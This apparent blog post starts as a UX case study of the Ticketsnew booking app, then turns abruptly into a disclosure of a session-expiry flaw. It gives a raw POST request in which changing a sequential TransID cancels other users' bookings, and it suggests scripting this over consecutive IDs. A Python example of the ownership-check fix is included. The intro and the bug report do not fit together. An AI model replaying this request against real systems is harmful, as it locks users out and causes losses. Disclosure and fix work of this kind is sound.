
Ticketsnew Movie Booking Software and Securities

Overview of Ticketsnew

This case study is based on the movie booking software Ticketsnew. It is fairly well known, with over 50 downloads on the Android App Store. The app offers a good, up-to-date place to check for films and cinemas around you. Booking tickets is now an effortless, fun, and exciting experience for its users. My main goal was to understand more about the problems Ticketsnew app users currently face and to introduce some additional features that create a better user experience and ease of use.

Problem Statement of Ticketsnew

To improve the current features of the app and make the overall user experience of the app much more immersive and easy. On the basis of this initial problem statement, I started to dig deep into the topic, beginning with user research. Ticketsnew is an online portal for booking film tickets in all of the major cities in India. The company was acquired by PayTM and is backed by Alibaba Pictures because of its growing customer base and easy UX.

Recently I discovered a bug that could have stopped you from booking tickets on the website. While I was examining GET and POST requests across the application by intercepting them with Burp Suite, I noticed a POST request that was used to expire my current user session. This request caught my attention because it had the transaction ID as a parameter.

Request 

POST /calls/ExpiresOngoingTrans HTTP/1.1
Host: www.ticketsnew.com
Connection: close
Content-Length: 20
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://www.ticketsnew.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.97 Safari/537.36
Content-Type: application/json; charset=UTF-8
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: ASP.NET_SessionId=lhmdgjpzu0cxqijhm1aecetk;

{"TransID":60500852}

My first thought was that I should try to expire other users' sessions by changing the ID. I sent the request to Burp Repeater and replaced the "TransID" with that of another user session I had started in incognito mode in a different browser. And boom, the session expired even before the time allotted by Ticketsnew.

Response on Ticketsnew

HTTP/1.1 200 OK
Cache-Control: private, max-age=0
Content-Type: application/json; charset=utf-8
Date: Thu, 06 Feb 2020 21:04:17 GMT
Server: Microsoft-IIS/8.5
Set-Cookie: tkttransid=60500800; expires=Sat, 06-Feb-2010 21:04:17 GMT; path=/
Vary: Accept-Encoding
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Content-Length: 9
Connection: Close

{"d":"1"}

On Ticketsnew, there is no check on where the request comes from or whether the change it makes is authorized. An interesting thing I noticed was that the transaction IDs assigned to sessions were sequential. So it was easy for me to predict the next session IDs and send the POST request. Writing a script that sends the POST request to consecutive IDs wouldn't be difficult for anyone either. Using this bug, anyone could prevent a user from booking tickets until they got frustrated and left the website, causing potential revenue loss to the company.
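One way a server could enforce the missing check, as an added example that is not Ticketsnew's code: the expiry handler only acts when the transaction belongs to the session making the request, and transaction IDs are random rather than sequential. The `TransactionStore` class, its method names and the session strings are hypothetical and constructed for illustration.

```python
import secrets


class TransactionStore:
    """In-memory stand-in for a booking back end (hypothetical, constructed)."""

    def __init__(self):
        self._owner = {}      # trans_id -> session id that started the booking
        self._active = set()  # trans_ids that still hold seats

    def begin(self, session_id):
        # Random ID instead of a counter, so neighbouring IDs cannot be predicted.
        trans_id = secrets.token_urlsafe(16)
        self._owner[trans_id] = session_id
        self._active.add(trans_id)
        return trans_id

    def is_active(self, trans_id):
        return trans_id in self._active

    def expire_unchecked(self, trans_id):
        # Behaviour described in the article: the ID alone decides what expires.
        self._active.discard(trans_id)
        return 200

    def expire(self, session_id, trans_id):
        # Hardened: the transaction must belong to the requesting session.
        owner = self._owner.get(trans_id)
        if owner is None or not secrets.compare_digest(owner, session_id):
            return 404  # same answer for "unknown" and "not yours": no ID oracle
        self._active.discard(trans_id)
        return 200


def demo():
    store = TransactionStore()
    alice, bob = "session-alice", "session-bob"  # constructed session ids
    t_alice, t_bob = store.begin(alice), store.begin(bob)
    t_old = store.begin(alice)
    store.expire_unchecked(t_old)  # no ownership check: any caller succeeds
    return {
        "unchecked_killed_booking": not store.is_active(t_old),
        "cross_user": store.expire(bob, t_alice),   # Bob targets Alice's booking
        "alice_still_active": store.is_active(t_alice),
        "own": store.expire(bob, t_bob),            # Bob expires his own booking
        "bob_active": store.is_active(t_bob),
        "unknown": store.expire(bob, "no-such-id"),
    }


if __name__ == "__main__":
    print(demo())
```
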

Ticketsnew is a fairly big company, and with PayTM being the parent company, the response was not professional. However, since the bug is resolved, I have written this article following the proper disclosure policy.
